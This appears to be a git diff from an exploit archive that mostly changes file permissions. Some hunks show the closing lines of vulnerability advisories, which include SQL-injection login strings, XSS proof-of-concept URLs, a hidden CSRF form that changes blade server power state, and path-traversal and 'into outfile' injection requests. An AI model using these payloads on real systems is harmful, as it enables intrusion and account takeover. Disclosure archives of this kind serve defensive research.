a/platforms/multiple/shellcode/13468.c b/platforms/multiple/shellcode/13468.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/shellcode/13469.c b/platforms/multiple/shellcode/13469.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/shellcode/39885.c b/platforms/multiple/shellcode/39885.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10170.txt b/platforms/multiple/webapps/10170.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10209.txt b/platforms/multiple/webapps/10209.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10292.txt b/platforms/multiple/webapps/10292.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10424.txt b/platforms/multiple/webapps/10424.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10431.txt b/platforms/multiple/webapps/10431.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10432.txt b/platforms/multiple/webapps/10432.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10448.txt b/platforms/multiple/webapps/10448.txt old mode 100755 new mode 100644 index b17246f10..bee434083 --- a/platforms/multiple/webapps/10448.txt +++ b/platforms/multiple/webapps/10448.txt @@ -54,4 +54,4 @@ HTML injection: http://server:port/pls/[DADName]/icx_define_pages.editpagelist http://server:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id] http://www.example.com:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id] -http://server:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE \ No newline at end of file +http://server:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE \ No newline at end of file diff --git a/platforms/multiple/webapps/10630.txt b/platforms/multiple/webapps/10630.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10752.txt b/platforms/multiple/webapps/10752.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10753.txt b/platforms/multiple/webapps/10753.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10754.txt b/platforms/multiple/webapps/10754.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10821.txt b/platforms/multiple/webapps/10821.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/10999.txt b/platforms/multiple/webapps/10999.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11184.txt b/platforms/multiple/webapps/11184.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11186.txt b/platforms/multiple/webapps/11186.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11187.txt b/platforms/multiple/webapps/11187.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11211.txt b/platforms/multiple/webapps/11211.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11218.txt b/platforms/multiple/webapps/11218.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11403.txt b/platforms/multiple/webapps/11403.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11404.txt b/platforms/multiple/webapps/11404.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11405.txt b/platforms/multiple/webapps/11405.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11409.txt b/platforms/multiple/webapps/11409.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/11527.html b/platforms/multiple/webapps/11527.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/12039.txt b/platforms/multiple/webapps/12039.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/12133.txt b/platforms/multiple/webapps/12133.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/12610.txt b/platforms/multiple/webapps/12610.txt old mode 100755 new mode 100644 index 91e88b773..6542de0f0 --- a/platforms/multiple/webapps/12610.txt +++ b/platforms/multiple/webapps/12610.txt @@ -52,4 +52,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsecrg [dot]com -http://www.dsecrg.com \ No newline at end of file +http://www.dsecrg.com \ No newline at end of file diff --git a/platforms/multiple/webapps/12689.txt b/platforms/multiple/webapps/12689.txt old mode 100755 new mode 100644 index a32095b87..bf4dcf885 --- a/platforms/multiple/webapps/12689.txt +++ b/platforms/multiple/webapps/12689.txt @@ -34,4 +34,4 @@ Copyright 2010 Procheckup Ltd. All rights reserved. Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. -Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. \ No newline at end of file +Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party. \ No newline at end of file diff --git a/platforms/multiple/webapps/12730.txt b/platforms/multiple/webapps/12730.txt old mode 100755 new mode 100644 index cce475455..7954302d9 --- a/platforms/multiple/webapps/12730.txt +++ b/platforms/multiple/webapps/12730.txt @@ -47,7 +47,4 @@ am nt hacker just Lik3 Syst3m S3curity __ __ __ __ __ __ .-----..-----.| |--..--.--..----.|__|| |_ |__|.-----..-----.| ||__|.-----..-----. |__ --|| -__|| < | | || _|| || _|| || _ || || || || || -__| - |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| - - - \ No newline at end of file + |_____||_____||__|__||_____||__| |__||____||__||_____||__|__||__||__||__|__||_____| \ No newline at end of file diff --git a/platforms/multiple/webapps/13754.txt b/platforms/multiple/webapps/13754.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/13794.txt b/platforms/multiple/webapps/13794.txt old mode 100755 new mode 100644 index 8373ffa54..c730debe4 --- a/platforms/multiple/webapps/13794.txt +++ b/platforms/multiple/webapps/13794.txt @@ -63,4 +63,4 @@ DEMO URL : ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/multiple/webapps/13918.txt b/platforms/multiple/webapps/13918.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14001.txt b/platforms/multiple/webapps/14001.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14004.txt b/platforms/multiple/webapps/14004.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14101.txt b/platforms/multiple/webapps/14101.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14103.txt b/platforms/multiple/webapps/14103.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14104.txt b/platforms/multiple/webapps/14104.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14117.txt b/platforms/multiple/webapps/14117.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14118.txt b/platforms/multiple/webapps/14118.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/14606.html b/platforms/multiple/webapps/14606.html old mode 100755 new mode 100644 index 81a214671..6cdfb811c --- a/platforms/multiple/webapps/14606.html +++ b/platforms/multiple/webapps/14606.html @@ -563,4 +563,4 @@ Author: ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~ -The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team \ No newline at end of file +The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team \ No newline at end of file diff --git a/platforms/multiple/webapps/14629.html b/platforms/multiple/webapps/14629.html old mode 100755 new mode 100644 index 0c0c7291f..395b203e0 --- a/platforms/multiple/webapps/14629.html +++ b/platforms/multiple/webapps/14629.html @@ -23,4 +23,4 @@ document.getElementById('submit').click(); </html> #####################Exploit Change Admin Password########################## -Ramadan Kareem !! \ No newline at end of file +Ramadan Kareem !! \ No newline at end of file diff --git a/platforms/multiple/webapps/14962.txt b/platforms/multiple/webapps/14962.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/15473.html b/platforms/multiple/webapps/15473.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/15611.txt b/platforms/multiple/webapps/15611.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/15710.txt b/platforms/multiple/webapps/15710.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/16959.txt b/platforms/multiple/webapps/16959.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/17111.txt b/platforms/multiple/webapps/17111.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/17174.txt b/platforms/multiple/webapps/17174.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/17393.txt b/platforms/multiple/webapps/17393.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/17404.txt b/platforms/multiple/webapps/17404.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/17572.txt b/platforms/multiple/webapps/17572.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/17606.txt b/platforms/multiple/webapps/17606.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18012.txt b/platforms/multiple/webapps/18012.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18117.txt b/platforms/multiple/webapps/18117.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18247.txt b/platforms/multiple/webapps/18247.txt old mode 100755 new mode 100644 index b95e5119b..13b3db62b --- a/platforms/multiple/webapps/18247.txt +++ b/platforms/multiple/webapps/18247.txt @@ -13,4 +13,4 @@ Log in details: Username: x'or'x'='x Password: x'or'x'='x --------------------------------------------------------------------------------"Indian" \ No newline at end of file +-------------------------------------------------------------------------------"Indian" \ No newline at end of file diff --git a/platforms/multiple/webapps/18262.txt b/platforms/multiple/webapps/18262.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18329.txt b/platforms/multiple/webapps/18329.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18430.txt b/platforms/multiple/webapps/18430.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18431.txt b/platforms/multiple/webapps/18431.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18452.txt b/platforms/multiple/webapps/18452.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18473.txt b/platforms/multiple/webapps/18473.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18553.txt b/platforms/multiple/webapps/18553.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18745.txt b/platforms/multiple/webapps/18745.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/18750.txt b/platforms/multiple/webapps/18750.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/21053.txt b/platforms/multiple/webapps/21053.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/21082.txt b/platforms/multiple/webapps/21082.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/21822.txt b/platforms/multiple/webapps/21822.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/21866.txt b/platforms/multiple/webapps/21866.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/22041.txt b/platforms/multiple/webapps/22041.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/22490.txt b/platforms/multiple/webapps/22490.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/22852.txt b/platforms/multiple/webapps/22852.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/23004.txt b/platforms/multiple/webapps/23004.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/23109.txt b/platforms/multiple/webapps/23109.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/23111.txt b/platforms/multiple/webapps/23111.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/23924.txt b/platforms/multiple/webapps/23924.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/24203.txt b/platforms/multiple/webapps/24203.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/24573.txt b/platforms/multiple/webapps/24573.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/24744.txt b/platforms/multiple/webapps/24744.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/24792.txt b/platforms/multiple/webapps/24792.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/24915.txt b/platforms/multiple/webapps/24915.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/24922.txt b/platforms/multiple/webapps/24922.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/24967.txt b/platforms/multiple/webapps/24967.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/26621.txt b/platforms/multiple/webapps/26621.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/28340.c b/platforms/multiple/webapps/28340.c old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/28563.txt b/platforms/multiple/webapps/28563.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/28854.txt b/platforms/multiple/webapps/28854.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/29034.txt b/platforms/multiple/webapps/29034.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/29389.txt b/platforms/multiple/webapps/29389.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/29435.txt b/platforms/multiple/webapps/29435.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/31233.txt b/platforms/multiple/webapps/31233.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/31234.txt b/platforms/multiple/webapps/31234.txt old mode 100755 new mode 100644 index d0f7349fb..73c991ad6 --- a/platforms/multiple/webapps/31234.txt +++ b/platforms/multiple/webapps/31234.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to access potentially sensitive information o These issues affect webcamXP 3.72.440 and 4.05.280 beta and prior versions. -http://www.example.com:8080/show_gallery_pic?id=999999 \ No newline at end of file +http://www.example.com:8080/show_gallery_pic?id=999999 \ No newline at end of file diff --git a/platforms/multiple/webapps/31329.txt b/platforms/multiple/webapps/31329.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/31647.txt b/platforms/multiple/webapps/31647.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/31673.txt b/platforms/multiple/webapps/31673.txt old mode 100755 new mode 100644 index abefe7c0d..aab92a712 --- a/platforms/multiple/webapps/31673.txt +++ b/platforms/multiple/webapps/31673.txt @@ -6,4 +6,4 @@ Successful exploits aid in transferring malicious content to unsuspecting users' Azureus HTML WebUI 0.7.6 is vulnerable; other versions may also be affected. -http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent \ No newline at end of file +http://www.example.com:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent \ No newline at end of file diff --git a/platforms/multiple/webapps/31983.txt b/platforms/multiple/webapps/31983.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/31990.txt b/platforms/multiple/webapps/31990.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/32162.txt b/platforms/multiple/webapps/32162.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/32556.txt b/platforms/multiple/webapps/32556.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/32576.txt b/platforms/multiple/webapps/32576.txt old mode 100755 new mode 100644 index 3fa43ffac..fc4e11951 --- a/platforms/multiple/webapps/32576.txt +++ b/platforms/multiple/webapps/32576.txt @@ -8,4 +8,4 @@ We don't know which versions of IBM Tivoli Netcool Service Quality Manager are a NOTE: IBM Tivoli Netcool Service Quality Manager may also have been known as 'Vallent Metrica Service Assurance'. -http://www.example.com/<document root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non persistant XSS");</SCRIPT><!--&date=0000000000000 http://www.example.com/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non Persistant XSS");</SCRIPT> http://www.example.com/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod =none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main \ No newline at end of file +http://www.example.com/<document root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non persistant XSS");</SCRIPT><!--&date=0000000000000 http://www.example.com/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non Persistant XSS");</SCRIPT> http://www.example.com/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod =none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main \ No newline at end of file diff --git a/platforms/multiple/webapps/32623.txt b/platforms/multiple/webapps/32623.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/32631.txt b/platforms/multiple/webapps/32631.txt old mode 100755 new mode 100644 index 10bdbea6f..204f0ee5a --- a/platforms/multiple/webapps/32631.txt +++ b/platforms/multiple/webapps/32631.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The issue affects versions prior to Rational ClearCase 7.0.0.4 and 7.0.1.3. -http://www.example.com/ccrc/??''??script?alert(1234)?/script?=123 \ No newline at end of file +http://www.example.com/ccrc/??''??script?alert(1234)?/script?=123 \ No newline at end of file diff --git a/platforms/multiple/webapps/32765.txt b/platforms/multiple/webapps/32765.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/32894.txt b/platforms/multiple/webapps/32894.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/32895.txt b/platforms/multiple/webapps/32895.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/32896.html b/platforms/multiple/webapps/32896.html old mode 100755 new mode 100644 index 74059f854..031ebe03d --- a/platforms/multiple/webapps/32896.html +++ b/platforms/multiple/webapps/32896.html @@ -11,4 +11,4 @@ An attacker can exploit these issues to obtain sensitive information, execute ar Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable. -<html> <body onload="document.foobar.submit()"> <form name="foobar" method="post" action="http://example.com/private/blade_power_action" style="display:none"> <input name="COMMAND" value="6.3.2"> <input name="STATE" value="0"> <input name="CHECKED" value="15"> <input name="selall" value="on"> <input name="sel" value="bl1"> <input name="sel" value="bl2"> <input name="sel" value="bl3"> <input name="sel" value="bl4"> <input name="JUNK" value="1"> </form> <body> </html> \ No newline at end of file +<html> <body onload="document.foobar.submit()"> <form name="foobar" method="post" action="http://example.com/private/blade_power_action" style="display:none"> <input name="COMMAND" value="6.3.2"> <input name="STATE" value="0"> <input name="CHECKED" value="15"> <input name="selall" value="on"> <input name="sel" value="bl1"> <input name="sel" value="bl2"> <input name="sel" value="bl3"> <input name="sel" value="bl4"> <input name="JUNK" value="1"> </form> <body> </html> \ No newline at end of file diff --git a/platforms/multiple/webapps/32908.txt b/platforms/multiple/webapps/32908.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33019.txt b/platforms/multiple/webapps/33019.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33180.txt b/platforms/multiple/webapps/33180.txt old mode 100755 new mode 100644 index 4dae9e912..24b056d7d --- a/platforms/multiple/webapps/33180.txt +++ b/platforms/multiple/webapps/33180.txt @@ -6,4 +6,4 @@ An attacker could exploit this vulnerability to execute arbitrary script code in Versions prior to Flex SDK 3.4 are vulnerable. -http://www.example.com/Flex/index.template.html?"/></object><script>alert('XSS')</script> \ No newline at end of file +http://www.example.com/Flex/index.template.html?"/></object><script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/multiple/webapps/33284.txt b/platforms/multiple/webapps/33284.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33370.html b/platforms/multiple/webapps/33370.html old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33438.txt b/platforms/multiple/webapps/33438.txt old mode 100755 new mode 100644 index 7be35e22d..32ff0e592 --- a/platforms/multiple/webapps/33438.txt +++ b/platforms/multiple/webapps/33438.txt @@ -4,4 +4,4 @@ webMathematica is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/webMathematica/MSP\<script>alert('a')</script> \ No newline at end of file +http://www.example.com/webMathematica/MSP\<script>alert('a')</script> \ No newline at end of file diff --git a/platforms/multiple/webapps/33493.txt b/platforms/multiple/webapps/33493.txt old mode 100755 new mode 100644 index c0ad831c6..79c70a621 --- a/platforms/multiple/webapps/33493.txt +++ b/platforms/multiple/webapps/33493.txt @@ -38,7 +38,4 @@ Setup -> Smart links -> Create new smart link -> Title it <script>alert("XSS")</ 5. Proof of concept video -http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi - - - \ No newline at end of file +http://research.openflare.org/poc/maya-edms/maya-edms_multiple_xss.avi \ No newline at end of file diff --git a/platforms/multiple/webapps/33511.txt b/platforms/multiple/webapps/33511.txt old mode 100755 new mode 100644 index 9f6c3414f..96460f831 --- a/platforms/multiple/webapps/33511.txt +++ b/platforms/multiple/webapps/33511.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Zenoss 2.3.3 is affected; other versions may be vulnerable as well. -http://www.example.com/zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=& offset=0&count=60 into outfile "/tmp/z" \ No newline at end of file +http://www.example.com/zport/dmd/Events/getJSONEventsInfo?severity=1&state=1&filter=& offset=0&count=60 into outfile "/tmp/z" \ No newline at end of file diff --git a/platforms/multiple/webapps/33578.txt b/platforms/multiple/webapps/33578.txt old mode 100755 new mode 100644 index 1cab98452..6de1a60e3 --- a/platforms/multiple/webapps/33578.txt +++ b/platforms/multiple/webapps/33578.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor This issue affects XAMPP 1.6.8 and prior; other versions may be vulnerable as well. -http://www.example.com/xampp/showcode.php?showcode=1&file=../index.php \ No newline at end of file +http://www.example.com/xampp/showcode.php?showcode=1&file=../index.php \ No newline at end of file diff --git a/platforms/multiple/webapps/33717.txt b/platforms/multiple/webapps/33717.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33731.txt b/platforms/multiple/webapps/33731.txt old mode 100755 new mode 100644 index 54dcee2b1..b8d17882e --- a/platforms/multiple/webapps/33731.txt +++ b/platforms/multiple/webapps/33731.txt @@ -9,4 +9,4 @@ Friendly Technologies TR-069 ACS 2.8.9 is vulnerable; other versions may also be The following example data is available: Username: ' or 1=1-- -Password: ' or 1=1-- \ No newline at end of file +Password: ' or 1=1-- \ No newline at end of file diff --git a/platforms/multiple/webapps/33759.txt b/platforms/multiple/webapps/33759.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33760.txt b/platforms/multiple/webapps/33760.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33764.txt b/platforms/multiple/webapps/33764.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33765.txt b/platforms/multiple/webapps/33765.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33894.txt b/platforms/multiple/webapps/33894.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33897.txt b/platforms/multiple/webapps/33897.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/33937.txt b/platforms/multiple/webapps/33937.txt old mode 100755 new mode 100644 index 36587e719..8ee95c4a4 --- a/platforms/multiple/webapps/33937.txt +++ b/platforms/multiple/webapps/33937.txt @@ -11,4 +11,4 @@ Example URIs are available: http://www.example.com/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E -http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/33995.txt b/platforms/multiple/webapps/33995.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34000.txt b/platforms/multiple/webapps/34000.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34111.txt b/platforms/multiple/webapps/34111.txt old mode 100755 new mode 100644 index 76451abf0..bea366b97 --- a/platforms/multiple/webapps/34111.txt +++ b/platforms/multiple/webapps/34111.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example data are available: user: a' or '1'='1 -password: a' or '1'='1 \ No newline at end of file +password: a' or '1'='1 \ No newline at end of file diff --git a/platforms/multiple/webapps/34148.txt b/platforms/multiple/webapps/34148.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34165.txt b/platforms/multiple/webapps/34165.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34224.txt b/platforms/multiple/webapps/34224.txt old mode 100755 new mode 100644 index bfba77cb4..e9af10bda --- a/platforms/multiple/webapps/34224.txt +++ b/platforms/multiple/webapps/34224.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow a remote attacker to perform certain administr The following example URI is available: -http://www.example.com/admin/backend/window/loadClass/saveItem?noCache=1277145391050&rsn=1&username=admin&passwd=admin&email=suck2%40example.org&groups=[%221%22]&module=users&code=users%2FeditMe%2F \ No newline at end of file +http://www.example.com/admin/backend/window/loadClass/saveItem?noCache=1277145391050&rsn=1&username=admin&passwd=admin&email=suck2%40example.org&groups=[%221%22]&module=users&code=users%2FeditMe%2F \ No newline at end of file diff --git a/platforms/multiple/webapps/34237.txt b/platforms/multiple/webapps/34237.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34408.txt b/platforms/multiple/webapps/34408.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34419.txt b/platforms/multiple/webapps/34419.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34449.txt b/platforms/multiple/webapps/34449.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34513.txt b/platforms/multiple/webapps/34513.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34525.txt b/platforms/multiple/webapps/34525.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34587.txt b/platforms/multiple/webapps/34587.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34865.txt b/platforms/multiple/webapps/34865.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34907.txt b/platforms/multiple/webapps/34907.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34908.txt b/platforms/multiple/webapps/34908.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34909.txt b/platforms/multiple/webapps/34909.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34910.txt b/platforms/multiple/webapps/34910.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34911.txt b/platforms/multiple/webapps/34911.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34912.txt b/platforms/multiple/webapps/34912.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34913.txt b/platforms/multiple/webapps/34913.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34914.txt b/platforms/multiple/webapps/34914.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34915.txt b/platforms/multiple/webapps/34915.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34916.txt b/platforms/multiple/webapps/34916.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/34917.txt b/platforms/multiple/webapps/34917.txt old mode 100755 new mode 100644 index 942be9fe6..ac5595301 --- a/platforms/multiple/webapps/34917.txt +++ b/platforms/multiple/webapps/34917.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br IBM Tivoli Access Manager for e-business 6.1.0 is vulnerable -http://www.example.com/ibm/wpm/webseal?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file +http://www.example.com/ibm/wpm/webseal?method=props%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/multiple/webapps/34929.txt b/platforms/multiple/webapps/34929.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35012.txt b/platforms/multiple/webapps/35012.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35210.txt b/platforms/multiple/webapps/35210.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35214.txt b/platforms/multiple/webapps/35214.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35219.txt b/platforms/multiple/webapps/35219.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35220.txt b/platforms/multiple/webapps/35220.txt old mode 100755 new mode 100644 diff --git a/platforms/multiple/webapps/35233.txt b/platforms/multiple/webapps/35233.txt old mode 100755 new mode 100644 index 0e9ed8ebf..db157818a --- a/platforms/multiple/webapps/35233.txt +++ b/platforms/multiple/webapps/35233.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute 